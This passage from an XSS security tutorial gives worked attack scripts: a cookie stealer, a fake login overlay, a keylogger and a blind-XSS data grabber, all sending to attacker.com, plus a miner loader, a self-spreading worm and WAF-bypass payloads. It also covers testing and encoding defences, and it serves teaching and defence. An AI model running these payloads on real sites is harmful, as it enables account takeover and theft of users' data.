โโโ Steal session cookies (document.cookie only exposes cookies WITHOUT the HttpOnly flag; HttpOnly sessions are abused in place by issuing requests from the injected script)
โโโ Impersonate victim
โโโ Bypass authentication
โโโ Full account takeover
๐ CREDENTIAL THEFT ๐ด CRITICAL
โโโ Inject fake login forms
โโโ Phishing on legitimate domain
โโโ Capture passwords
โโโ Steal API keys/tokens
๐ DATA EXFILTRATION ๐ด CRITICAL
โโโ Read sensitive page data
โโโ Extract personal information
โโโ Download private files
โโโ Access restricted content
๐ญ DEFACEMENT ๐ก MEDIUM
โโโ Modify page content
โโโ Display malicious messages
โโโ Damage brand reputation
โโโ Spread misinformation
๐ฆ MALWARE DISTRIBUTION ๐ด CRITICAL
โโโ Redirect to malware sites
โโโ Drive-by downloads
โโโ Browser exploits
โโโ Ransomware delivery
๐ท KEYLOGGING ๐ด CRITICAL
โโโ Capture all keystrokes
โโโ Record form inputs
โโโ Steal credit card details
โโโ Monitor victim activity
๐ PRIVACY INVASION ๐ HIGH
โโโ Access geolocation (within whatever permission the user already granted the site)
โโโ Request camera/mic access
โโโ Track browsing history
โโโ Monitor clipboard
๐ FURTHER ATTACKS ๐ด CRITICAL
โโโ Pivot to internal network
โโโ Exploit other vulnerabilities
โโโ Spread as worm
โโโ Chain multiple attacks
๐ Real-World Attack Scenarios
Scenario 1: Session Hijacking & Account Takeover
// ๐ฏ Attacker's injected payload
<script>
// 1๏ธโฃ Steal all cookies
var cookies = document.cookie;
// 2๏ธโฃ Send to attacker's server
fetch('https://attacker.com/steal', {
method: 'POST',
body: JSON.stringify({
cookies: cookies,
url: window.location.href,
timestamp: new Date().toISOString()
})
});
// 3๏ธโฃ Optionally keep victim on page (no suspicion)
</script>
โฐ ATTACK TIMELINE:
โโโโโโโโโโโโโโโโโ
14:23:45 - Victim clicks malicious link
14:23:46 - JavaScript executes, cookies sent
14:23:47 - Attacker receives: session_id=abc123xyz...
14:24:00 - Attacker opens browser
14:24:15 - Attacker sets stolen cookie
14:24:20 - Attacker loads site โ LOGGED IN AS VICTIM
14:25:00 - Changes password, email
14:30:00 - Victim locked out permanently
๐ฅ IMPACT:
โข Complete account takeover
โข Victim loses access
โข Attacker controls account
โข Potential identity theft
Scenario 2: Credential Harvesting (Fake Login)
<script>
// ๐ญ Create a convincing fake login overlay
document.body.innerHTML = `
<div style="
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(0,0,0,0.9);
z-index: 999999;
display: flex;
justify-content: center;
align-items: center;">
<div style="
background: white;
padding: 40px;
border-radius: 8px;
box-shadow: 0 4px 20px rgba(0,0,0,0.3);
max-width: 400px;
width: 90%;">
<img src="` + window.location.origin + `/logo.png" style="width:200px;display:block;margin:0 auto 20px">
<h2 style="text-align:center;color:#333;margin-bottom:10px">Session Expired</h2>
<p style="text-align:center;color:#666;margin-bottom:20px">Please log in again to continue</p>
<form id="phishForm">
<input type="text" name="username" placeholder="Username" required style="width:100%;padding:12px;margin-bottom:15px;border:1px solid #ddd;border-radius:4px;box-sizing:border-box;">
<input type="password" name="password" placeholder="Password" required style="width:100%;padding:12px;margin-bottom:20px;border:1px solid #ddd;border-radius:4px;box-sizing:border-box;">
<button type="submit" style="width:100%;padding:12px;background:#007bff;color:white;border:none;border-radius:4px;cursor:pointer;font-size:16px">Log In</button>
</form>
</div>
</div>
`;
// ๐ฃ Intercept form submission
document.getElementById('phishForm').onsubmit = function(e) {
e.preventDefault();
var username = this.username.value;
var password = this.password.value;
// ๐ค Send credentials to attacker
fetch('https://attacker.com/phish', {
method: 'POST',
body: JSON.stringify({
site: window.location.hostname,
username: username,
password: password,
timestamp: new Date().toISOString()
})
}).then(() => {
// ๐ Redirect to real login page after stealing
window.location.href = '/login?session_expired=true';
});
};
</script>
๐ฏ WHY IT WORKS:
โ Same domain (looks legitimate, and the TLS padlock is genuine)
โ Branded logo (builds trust)
โ Professional design
โ "Session expired" message (urgency)
โ No visible signs of phishing
๐ SUCCESS RATE: high, because the usual phishing tells (wrong domain, certificate warning) are absent and the user has nothing to notice
Scenario 3: Keylogger
<script>
// ๐ฏ Install invisible keylogger
var keys = [];
document.addEventListener('keypress', function(e) {
keys.push({
key: e.key,
time: new Date().toISOString(),
target: e.target.tagName
});
// ๐ค Send batch every 10 keys
if (keys.length >= 10) {
fetch('https://attacker.com/keys', {
method: 'POST',
body: JSON.stringify(keys)
});
keys = [];
}
});
// ๐ฃ Capture form submissions (passwords, credit cards)
document.addEventListener('submit', function(e) {
var formData = new FormData(e.target);
var data = {};
for(var pair of formData.entries()) {
data[pair[0]] = pair[1];
}
fetch('https://attacker.com/forms', {
method: 'POST',
body: JSON.stringify(data)
});
});
</script>
๐ฏ CAPTURES:
โข Every keystroke
โข Passwords
โข Credit card numbers
โข Personal messages
โข Sensitive data entry
Scenario 4: Cryptocurrency Miner
<script src="https://attacker.com/coinhive.min.js"></script>
<script>
// โ๏ธ Use victim's CPU to mine cryptocurrency (the Coinhive service shut down in March 2019; the pattern survives with other in-browser miners)
var miner = new CoinHive.Anonymous('attacker-wallet-id', {
threads: 4,
autoThreads: false,
throttle: 0.2
});
miner.start();
// ๐คซ Run silently in background
</script>
โ ๏ธ IMPACT:
โข High CPU usage (100%)
โข Computer slows down
โข Increased electricity costs
โข Battery drain (mobile)
๐ฐ Attacker profits from victim's resources
Scenario 5: Self-Propagating Worm
<script>
// ๐ฆ XSS Worm that spreads itself
(function() {
// The worm's code (this script). document.currentScript is only set while a parser-inserted <script> is running; an <img onerror=...> vector would have to carry its own copy of the payload instead.
var wormCode = document.currentScript.outerHTML;
// ๐ Find all comment/post forms
var forms = document.querySelectorAll('form');
forms.forEach(function(form) {
// โณ Wait for user to post anything
form.addEventListener('submit', function(e) {
// ๐ Inject worm into their post
var textAreas = form.querySelectorAll('textarea');
textAreas.forEach(function(textarea) {
textarea.value += wormCode;
});
});
});
// ๐ค Also post immediately as new comment
fetch('/api/comment', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
text: 'Interesting article! ' + wormCode
})
});
})();
</script>
๐ RESULT:
1๏ธโฃ Victim A views infected comment
2๏ธโฃ Worm executes and posts itself as new comment
3๏ธโฃ Victim B views worm's comment
4๏ธโฃ Worm executes and posts itself again
5๏ธโฃ Exponential spread across entire platform
6๏ธโฃ Within hours: thousands of users infected
๐ FAMOUS EXAMPLE: Samy Worm (MySpace 2005)
- Spread to 1 million profiles in 20 hours
๐ Impact by Application Type
๐ฆ BANKING/FINANCIAL:
โโโ Account takeover
โโโ Money transfer
โโโ Stealing credentials
โโโ Viewing account details
โโโ ๐ด CRITICAL IMPACT
๐ E-COMMERCE:
โโโ Order manipulation
โโโ Credit card theft
โโโ Address changes
โโโ Fraudulent purchases
โโโ ๐ด HIGH IMPACT
๐ฅ HEALTHCARE:
โโโ Medical record access
โโโ HIPAA violations
โโโ Patient data theft
โโโ Prescription manipulation
โโโ ๐ด CRITICAL IMPACT
๐ฑ SOCIAL MEDIA:
โโโ Profile takeover
โโโ Post malicious content
โโโ Spread worms
โโโ Steal personal data
โโโ ๐ MEDIUM-HIGH IMPACT
๐ข ENTERPRISE/CORPORATE:
โโโ Internal data theft
โโโ Intellectual property
โโโ Corporate espionage
โโโ Network infiltration
โโโ ๐ด CRITICAL IMPACT
๐ Famous Real-World XSS Attacks
๐ฏ CASE STUDY 1: Samy Worm (MySpace, 2005)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฑ Platform: MySpace
๐ค Attacker: Samy Kamkar
๐ฏ Type: Stored XSS Worm
๐ฅ WHAT HAPPENED:
โข Exploited MySpace profile page XSS
โข Payload added "Samy is my hero" to profiles
โข Added Samy as friend automatically
โข Copied itself to infected profiles
๐
TIMELINE:
โข Started: October 4, 2005
โข Hour 1: first friend request
โข Hour 5: 221 friends
โข Hour 13: ~8,800
โข Hour 18: 1,000,000+ profiles infected
โข Result: MySpace taken offline for hours to clean up
โ๏ธ LEGAL OUTCOME:
โข Samy charged by authorities in 2006
โข Pleaded guilty to a felony computer-hacking charge
โข 3 years probation, 90 days community service, restitution
โข Barred from internet use for the probation period
๐ LESSON: XSS can spread exponentially
๐ฏ CASE STUDY 2: TweetDeck XSS (Twitter, 2014)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฆ Platform: TweetDeck (Twitter client)
๐ฏ Type: Stored XSS Worm
๐ฅ WHAT HAPPENED:
โข XSS in tweet rendering
โข Payload in tweet content
โข Self-replicating through retweets
โข Affected TweetDeck users globally
โก IMPACT:
โข Thousands of accounts infected
โข Automatic retweeting of payload
โข Pop-ups and unwanted alerts
โข Twitter forced to take TweetDeck offline
๐ง FIX:
โข Emergency patch deployed
โข Improved input sanitization
โข Enhanced XSS protection
๐ฏ CASE STUDY 3: eBay Stored XSS (2015-2016)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ Platform: eBay
๐ฏ Type: Stored XSS
โฐ Duration: Existed for months
๐ฅ WHAT HAPPENED:
โข XSS in product listings
โข Attackers created malicious listings
โข Fake login forms on eBay domain
โข Credential theft at scale
โก IMPACT:
โข Unknown number of compromised accounts
โข Stolen credentials sold on dark web
โข Reputational damage to eBay
โข Multiple security researchers reported it
๐ LESSON: Even major platforms can have XSS
๐ฏ CASE STUDY 4: British Airways XSS (2018)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ๏ธ Platform: British Airways website
๐ฏ Type: Client-side script injection via compromised site assets (Magecart)
๐ฅ WHAT HAPPENED:
โข Attackers gained access to BA's web infrastructure and modified a JavaScript library (Modernizr) served from BA's own site
โข The modified script was a payment card skimmer posting card data to an attacker-controlled look-alike domain
โข Ran on BA's website for 15 days
โข Stole customer payment data
โก IMPACT:
โข 380,000 payment cards compromised
โข ยฃ20 million GDPR fine from the ICO in 2020 (reduced from the ยฃ183 million initially announced)
โข Massive reputation damage
โข Class action lawsuits
๐ LESSON: Third-party scripts are attack vectors
๐ฏ CASE STUDY 5: Fortnite XSS (2019)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฎ Platform: Epic Games (Fortnite)
๐ฏ Type: XSS on a legacy subdomain chained with an SSO redirect flaw
๐ฌ Researchers: Check Point
๐ฅ WHAT HAPPENED:
โข XSS on an old, unmaintained epicgames.com subdomain
โข The login flow's redirect parameter could be pointed at that subdomain
โข Injected script captured the victim's SSO token without any credential entry
โข Token gave access to the account, payment methods and V-Bucks
โ ๏ธ POTENTIAL IMPACT:
โข 200+ million player accounts at risk
โข Account takeovers
โข Financial theft
โข Epic patched quickly after disclosure
๐ LESSON: Gaming platforms are valuable targets
๐ 7. FINDING XSS VULNERABILITIES
๐ Complete Testing Methodology
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ XSS VULNERABILITY TESTING WORKFLOW โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ PHASE 1: RECONNAISSANCE
โโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐บ๏ธ Map the application
โโโ ๐ Identify all input points
โโโ ๐ Document data flow
โโโ ๐ฌ Analyze JavaScript code
โโโ ๐ Review security headers
๐ฏ PHASE 2: INITIAL PROBING
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐งช Test with benign payloads
โโโ ๐๏ธ Observe reflection patterns
โโโ ๐ Identify encoding/filtering
โโโ ๐บ๏ธ Map input validation
โโโ ๐ Document vulnerable parameters
๐ฏ PHASE 3: EXPLOITATION
โโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐ ๏ธ Craft context-specific payloads
โโโ ๐ง Bypass filters/WAF
โโโ ๐ Test different browsers
โโโ โ Verify JavaScript execution
โโโ ๐ Confirm exploitability
๐ฏ PHASE 4: IMPACT ASSESSMENT
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐ฏ Determine attack surface
โโโ ๐ Evaluate data sensitivity
โโโ โฌ๏ธ Test privilege escalation
โโโ ๐ Document full impact
โโโ โ ๏ธ Assign severity rating
๐ฏ PHASE 5: REPORTING
โโโโโโโโโโโโโโโโโโโโโ
โโโ ๐ Create proof-of-concept
โโโ ๐ Document reproduction steps
โโโ ๐ง Provide remediation advice
โโโ ๐ Rate CVSS score
โโโ ๐ค Submit responsible disclosure
๐ Input Point Discovery
๐ฏ ALL POSSIBLE XSS ENTRY POINTS:
1๏ธโฃ ๐ FORM FIELDS:
โโโ Text inputs
โโโ Textareas
โโโ Hidden fields
โโโ Search boxes
โโโ File upload fields
2๏ธโฃ ๐ URL PARAMETERS:
โโโ Query strings (?param=value)
โโโ Path parameters (/user/123)
โโโ Fragment identifiers (#section)
โโโ Redirect parameters
3๏ธโฃ ๐จ HTTP HEADERS:
โโโ User-Agent
โโโ Referer
โโโ Cookie
โโโ X-Forwarded-For
โโโ Custom headers
4๏ธโฃ ๐ FILE OPERATIONS:
โโโ Filename
โโโ File content
โโโ Metadata (EXIF)
โโโ File type
5๏ธโฃ ๐ API ENDPOINTS:
โโโ REST APIs
โโโ GraphQL
โโโ WebSocket messages
โโโ JSON/XML responses
6๏ธโฃ ๐ช STORAGE:
โโโ Cookies
โโโ localStorage
โโโ sessionStorage
โโโ IndexedDB
7๏ธโฃ ๐ก THIRD-PARTY INTEGRATIONS:
โโโ OAuth callbacks
โโโ SAML responses
โโโ Widgets
โโโ Embedded content
๐งช Basic Test Payloads
๐ฏ PHASE 1: SIMPLE DETECTION
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
๐ฏ PHASE 2: EVENT HANDLERS
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
๐ฏ PHASE 3: JAVASCRIPT PROTOCOLS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<a href="javascript:alert(1)">Click</a>
<iframe src="javascript:alert(1)">
<form action="javascript:alert(1)">
๐ฏ PHASE 4: DATA PROTOCOLS (a frame or object loaded from a data: URL gets an opaque origin, so a pop-up here proves injection but not access to the page's cookies or DOM)
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
<object data="data:text/html,<script>alert(1)</script>">
<embed src="data:text/html,<script>alert(1)</script>">
<iframe src="data:text/html,<script>alert(1)</script>">
๐ฏ PHASE 5: DOM-BASED TESTS (values handled by client-side code; view-source will not show the result, use DevTools)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
#<img src=x onerror=alert(1)>
?search=<script>alert(1)</script>
javascript:alert(1)
๐ฌ Advanced Testing Techniques
Testing Methodology for Different Contexts:
// 1๏ธโฃ HTML Context Test
// Input gets reflected in HTML body
Test Input: <script>alert('HTML')</script>
Expected Result: Script executes
// 2๏ธโฃ Attribute Context Test
// Input reflected inside HTML attribute
Test Input: " onfocus=alert('ATTR') autofocus="
Expected Result: Breaks out of attribute, executes
// 3๏ธโฃ JavaScript Context Test
// Input inside <script> tags or JS code
Test Input: '; alert('JS'); //
Expected Result: Closes string, executes, comments rest
// 4๏ธโฃ URL Context Test
// Input used in href/src attributes
Test Input: javascript:alert('URL')
Expected Result: JavaScript protocol executes
// 5๏ธโฃ CSS Context Test
// Input in style attributes or tags
Test Input: </style><script>alert('CSS')</script>
Expected Result: Breaks out of CSS context
๐ ๏ธ Automated Scanning Tools
๐ง SPECIALIZED XSS SCANNERS:
โโโ XSStrike (Python)
โโโ Dalfox (Go)
โโโ XSSer
โโโ XSScrapy
โโโ Breach XSS Scanner
๐ท๏ธ WEB APPLICATION SCANNERS:
โโโ Burp Suite Pro
โโโ OWASP ZAP
โโโ Acunetix
โโโ Netsparker
โโโ Qualys
๐ BROWSER EXTENSIONS:
โโโ XSS Validator (Chrome)
โโโ Wappalyzer (Tech detection)
โโโ Hack-Tools
โโโ Cookie Editor
โก MANUAL TESTING TOOLS:
โโโ Burp Suite (Intruder/Repeater)
โโโ Browser DevTools
โโโ Postman/Insomnia
โโโ cURL
โโโ DOM Invader
๐ Testing Checklist
โ Test ALL input fields
โ Test URL parameters
โ Test HTTP headers
โ Test file uploads
โ Test API endpoints
โ Review JavaScript code
โ Check for DOM XSS
โ Test with multiple browsers
โ Check security headers
โ Test filter bypasses
โ Document all findings
โ Create PoC exploits
โ Assess impact/severity
โ Prepare report
๐ฌ 8. TESTING METHODOLOGY
๐งช COMPREHENSIVE XSS TESTING FRAMEWORK
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ XSS TESTING METHODOLOGY โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ PHASE 1: INFORMATION GATHERING
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐บ๏ธ Application Mapping
โ โโโ Identify all endpoints
โ โโโ Map input parameters
โ โโโ Document JavaScript usage
โ โโโ Analyze third-party dependencies
โ
โโโ ๐ Technology Stack Analysis
โ โโโ Identify frameworks
โ โโโ Detect WAF presence
โ โโโ Analyze security headers
โ โโโ Check for CSP
โ
โโโ ๐ Test Environment Setup
โโโ Configure proxy (Burp/ZAP)
โโโ Set up browser extensions
โโโ Prepare test payloads
โโโ Establish monitoring
๐ฏ PHASE 2: STATIC ANALYSIS
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐ Source Code Review
โ โโโ Find dangerous sinks
โ โโโ Identify input sources
โ โโโ Check encoding practices
โ โโโ Review third-party code
โ
โโโ ๐๏ธ JavaScript Analysis
โ โโโ DOM XSS sources/sinks
โ โโโ jQuery/JS framework usage
โ โโโ Event handlers
โ โโโ Dynamic code evaluation
โ
โโโ ๐ Configuration Review
โโโ Security headers
โโโ CSP policies
โโโ WAF configurations
โโโ Logging settings
🎯 PHASE 3: DYNAMIC TESTING
───────────────────────────
├── Manual Testing
│   ├── Test all input fields
│   ├── Check URL parameters
│   ├── Test HTTP headers
│   └── File upload testing
│
├── 🤖 Automated Scanning
│   ├── Run vulnerability scanners
│   ├── Fuzz with payloads
│   ├── Test filter bypasses
│   └── Check encoding issues
│
└── 🎯 Context-Specific Testing
    ├── HTML context testing
    ├── Attribute context testing
    ├── JavaScript context testing
    ├── URL context testing
    └── CSS context testing
🎯 PHASE 4: ADVANCED TESTING
────────────────────────────
├── WAF Bypass Testing
│   ├── Test encoding variations
│   ├── Try polyglot payloads
│   ├── Test with different HTTP methods
│   └── Check case sensitivity
│
├── Blind XSS Testing
│   ├── Deploy callback servers
│   ├── Test admin interfaces
│   ├── Check log viewers
│   └── Monitor for callbacks
│
└── DOM XSS Testing
    ├── Test fragment identifiers
    ├── Check localStorage/sessionStorage
    ├── Test postMessage
    └── Analyze dynamic code execution
🎯 PHASE 5: VALIDATION & REPORTING
──────────────────────────────────
├── ✅ Proof-of-Concept Creation
│   ├── Create working exploits
│   ├── Document attack vectors
│   ├── Record exploitation steps
│   └── Capture evidence
│
├── Impact Assessment
│   ├── Evaluate data exposure
│   ├── Assess privilege escalation
│   ├── Check worm potential
│   └── Determine business impact
│
└── Report Generation
    ├── Executive summary
    ├── Technical details
    ├── Reproduction steps
    ├── Remediation advice
    └── CVSS scoring

🎯 TESTING CHECKLIST
GENERAL TESTING:
☐ Test all URL parameters
☐ Test all form fields
☐ Test HTTP headers (User-Agent, Referer, Cookie)
☐ Test file uploads (filename, metadata)
☐ Test API endpoints
☐ Test WebSocket messages
☐ Test local/session storage
☐ Test postMessage usage

CONTEXT-SPECIFIC TESTING:
☐ HTML context: <script>alert(1)</script>
☐ Attribute context: " onmouseover="alert(1)
☐ JavaScript context: ';alert(1);//
☐ URL context: javascript:alert(1)
☐ CSS context: </style><script>alert(1)</script>

FILTER BYPASS TESTING:
☐ Case variation: <ScRiPt>alert(1)</ScRiPt>
☐ Encoding: %3Cscript%3Ealert(1)%3C/script%3E
☐ Double encoding: %253Cscript%253Ealert(1)%253C/script%253E
☐ HTML ent
ities: &lt;script&gt;alert(1)&lt;/script&gt;
☐ Whitespace: <img/src=x/onerror=alert(1)>
☐ Comments: <scr<!--comment-->ipt>alert(1)</script>

DOM XSS TESTING:
☐ location.hash manipulation
☐ document.write() usage
☐ innerHTML/outerHTML usage
☐ eval()/setTimeout() with user input
☐ jQuery insecure usage
☐ AngularJS injection

BLIND XSS TESTING:
☐ Contact forms
☐ Support tickets
☐ User profiles
☐ Comment systems
☐ File uploads
☐ HTTP headers

SECURITY CONTROLS TESTING:
☐ CSP bypass attempts
☐ WAF evasion techniques
☐ Input validation bypass
☐ Output encoding bypass
☐ Framework-specific bypasses

🧪 TEST PAYLOADS LIBRARY
Basic Detection Payloads:
<!-- 🎯 Simple alert -->
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<!-- 🎯 Image with error handler -->
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.domain)>
<!-- 🎯 SVG payload -->
<svg onload=alert()>
<svg><script>alert(1)</script></svg>
<!-- 🎯 Iframe -->
<iframe src="javascript:alert(1)">
<!-- 🎯 Body event -->
<body onload=alert(1)>

Attribute Context Payloads:
<!-- 🎯 Break out of attribute -->
" onmouseover="alert(1)
" onfocus="alert(1)" autofocus="
' onmouseover='alert(1)
' onfocus='alert(1)' autofocus='
<!-- 🎯 Without quotes -->
onmouseover=alert(1)
onfocus=alert(1) autofocus
<!-- 🎯 JavaScript protocol -->
javascript:alert(1)
JaVaScRiPt:alert(1)
java	script:alert(1)

JavaScript Context Payloads:
// 🎯 String termination
';alert(1);//
';alert(1);'
\';alert(1);//
// 🎯 Template literals
${alert(1)}
`${alert(1)}`
// 🎯 Function termination
);alert(1);//
));alert(1);//
// 🎯 Object termination
};alert(1);//
}};alert(1);//
// 🎯 Array termination
];alert(1);//
[1,2,3];alert(1);//

DOM-Based Payloads:
// 🎯 Location manipulation
javascript:alert(1)
#<img src=x onerror=alert(1)>
// 🎯 Eval-based
eval('alert(1)')
setTimeout('alert(1)',0)
setInterval('alert(1)',1000)
Function('alert(1)')()
// 🎯 DOM manipulation
document.write('<script>alert(1)</script>')
element.innerHTML = '<img src=x onerror=alert(1)>'
element.outerHTML = '<img src=x onerror=alert(1)>'

WAF Bypass Payloads:
<!-- 🎯 Case manipulation -->
<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x ONERROR=alert(1)>
<!-- 🎯 Encoding -->
%3Cscript%3Ealert(1)%3C/script%3E
&lt;script&gt;alert(1)&lt;/script&gt;
\u003cscript\u003ealert(1)\u003c/script\u003e
<!-- 🎯 Whitespace tricks -->
<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)>
<!-- 🎯 Tag nesting -->
<scr<script>ipt>alert(1)</script>
<!-- 🎯 Polyglot payload -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Blind XSS Payloads:
<!-- 🎯 Basic callback -->
<script>fetch('https://attacker.com/?c='+document.cookie)</script>
<!-- 🎯 Image beacon -->
<script>new Image().src='https://attacker.com/?c='+document.cookie</script>
<!-- 🎯 Comprehensive data theft -->
<script>
var data = {
  url: location.href,
  cookies: document.cookie,
  localStorage: JSON.stringify(localStorage),
  userAgent: navigator.userAgent
};
fetch('https://attacker.com/collect', {
  method: 'POST',
  body: JSON.stringify(data)
});
</script>

🛠️ TESTING TOOLS SETUP
Burp Suite Configuration:
🎯 BURP SUITE SETUP FOR XSS TESTING:
1️⃣ PROXY CONFIGURATION:
├── Set up interception proxy
├── Install CA certificate
├── Configure scope
└── Enable logging
2️⃣ INTRUDER PAYLOADS:
├── Load XSS payload wordlists
├── Configure attack types
├── Set payload processing rules
└── Enable grep matching
3️⃣ EXTENSIONS:
├── DOM Invader (for DOM XSS)
├── Active Scan++
├── Autorize
└── Logger++
4️⃣ SCANNER CONFIGURATION:
├── Enable active scanning
├── Configure audit checks
├── Set insertion points
└── Enable JavaScript analysis

Browser Extensions:
CHROME EXTENSIONS FOR XSS TESTING:
1️⃣ 🛠️ DEVELOPMENT TOOLS:
├── Chrome DevTools (built-in)
├── DOM Breakpoints
├── JavaScript Debugger
└── Network Inspector
2️⃣ SECURITY EXTENSIONS:
├── XSS Validator
├── Hack-Tools
├── Wappalyzer (tech detection)
├── Cookie Editor
└── EditThisCookie
3️⃣ 🎯 TESTING EXTENSIONS:
├── XSS Rays
├── XSS Helper
├── Max Keyboard (for testing)
└── User-Agent Switcher

Command Line Tools:
# 🎯 XSStrike - Advanced XSS Scanner
python3 xsstrike.py -u "https://example.com/search?q=test"
# 🎯 Dalfox - Fast XSS Scanner
dalfox url https://example.com/search?q=test
dalfox file urls.txt
# 🎯 XSSer
xsser -u "https://example.com" -g "search?q=XSS"
# 🎯 Nuclei XSS Templates
nuclei -u https://example.com -t xss.yaml
# 🎯 FFUF for Fuzzing
ffuf -w xss-payloads.txt -u "https://example.com/search?q=FUZZ"

Wordlists for Testing:
# Recommended XSS Wordlists
├── SecLists/XSS/
│   ├── XSS_BruteLogic.txt
│   ├── XSS_Fuzzing.txt
│   ├── XSS_Polyglot.txt
│   └── XSS_Quick.txt
├── fuzzdb/xss/
├── payloadbox/xss-payload-list
└── bo0om/xss.txt

TESTING REPORT TEMPLATE
┌──────────────────────────────────────────────────────────┐
│                 XSS VULNERABILITY REPORT                 │
└──────────────────────────────────────────────────────────┘
EXECUTIVE SUMMARY
─────────────────
• Vulnerability: Cross-Site Scripting (XSS)
• Severity: Critical (CVSS: 8.2)
• Affected Component: User Comment System
• Impact: Account takeover, data theft
• Recommendation: Immediate remediation
TECHNICAL DETAILS
─────────────────
• Vulnerability Type: Stored XSS
• Attack Vector: User comments field
• Affected Parameter: comment_text
• Request Method: POST
• Endpoint: /api/comments
• Payload: <script>alert(document.cookie)</script>
🎯 REPRODUCTION STEPS
─────────────────────
1. Navigate to https://example.com/post/123
2. Submit comment with payload:
   <script>fetch('https://attacker.com/?c='+document.cookie)</script>
3. View comment as another user
4. Observe cookie theft in attacker logs
IMPACT ANALYSIS
───────────────
• Data Exposure: Session cookies, user data
• Privilege Escalation: Yes
• Worm Potential: High
• Affected Users: All users viewing comments
• Business Impact: Account compromise, reputation damage
🛡️ REMEDIATION RECOMMENDATIONS
──────────────────────────────
1. Input Validation:
   • Implement strict whitelist validation
   • Reject HTML tags in comments field
2. Output Encoding:
   • Use context-aware encoding
   • Encode before rendering:
     htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
3. Content Security Policy:
   • Implement strict CSP
   • Use nonces for inline scripts
4. Framework Security:
   • Use built-in escaping features
   • Avoid dangerous functions
REFERENCES
──────────
• OWASP XSS Prevention Cheat Sheet
• PortSwigger XSS Academy
• MDN Web Security Guidelines
• Framework Security Documentation
EVIDENCE
────────
• Screenshots: [attached]
• Proof-of-Concept: [attached]
• Network Logs: [attached]
• Video Demonstration: [attached]

🛡️ 9. PREVENTION & MITIGATION
1️⃣ 🔤 OUTPUT ENCODING
🎯 GOLDEN RULE:
"Never trust user input. Always encode output!"
ENCODING BY CONTEXT:
┌──────────────────┬────────────────────────────────┐
│ Context          │ Encoding Method                │
├──────────────────┼────────────────────────────────┤
│ HTML Body        │ HTML Entity Encoding           │
│                  │ &  →  &amp;                    │
│                  │ <  →  &lt;                     │
│                  │ >  →  &gt;                     │
│                  │ "  →  &quot;                   │
│                  │ '  →  &#x27;                   │
├──────────────────┼────────────────────────────────┤
│ HTML Attributes  │ HTML Attribute Encoding        │
│                  │ &  →  &amp;                    │
│                  │ <  →  &lt;                     │
│                  │ >  →  &gt;                     │
│                  │ "  →  &quot;                   │
│                  │ '  →  &#x27;                   │
├──────────────────┼────────────────────────────────┤
│ JavaScript       │ JavaScript Encoding            │
│                  │ '  →  \'                       │
│                  │ "  →  \"                       │
│                  │ \  →  \\                       │
│                  │ /  →  \/                       │
│                  │ <  →  \x3c                     │
├──────────────────┼────────────────────────────────┤
│ URL              │ URL Encoding                   │
│                  │ &  →  %26                      │
│                  │ <  →  %3C                      │
│                  │ >  →  %3E                      │
│                  │ "  →  %22                      │
│                  │ '  →  %27                      │
├──────────────────┼────────────────────────────────┤
│ CSS              │ CSS Encoding                   │
│                  │ <  →  \3C                      │
│                  │ >  →  \3E                      │
│                  │ (  →  \28                      │
│                  │ )  →  \29                      │
│                  │ "  →  \22                      │
└──────────────────┴────────────────────────────────┘

Implementation Examples:
// 🛡️ JavaScript Encoding Functions
// (the entity names were lost in rendering; these are the real replacements)
function encodeHTML(text) {
  return text.replace(/[&<>"']/g, function(match) {
    return {
      '&': '&amp;',
      '<': '&lt;',
      '>': '&gt;',
      '"': '&quot;',
      "'": '&#x27;'
    }[match];
  });
}
function encodeAttribute(text) {
  return text.replace(/[&<>"'`]/g, function(match) {
    return {
      '&': '&amp;',
      '<': '&lt;',
      '>': '&gt;',
      '"': '&quot;',
      "'": '&#x27;',
      '`': '&#x60;'
    }[match];
  });
}
function encodeJS(text) {
  return text.replace(/[\\'"<>\/]/g, function(match) {
    return {
      '\\': '\\\\',
      "'": "\\'",
      '"': '\\"',
      '<': '\\x3c',
      '>': '\\x3e',
      '/': '\\/'
    }[match];
  });
}
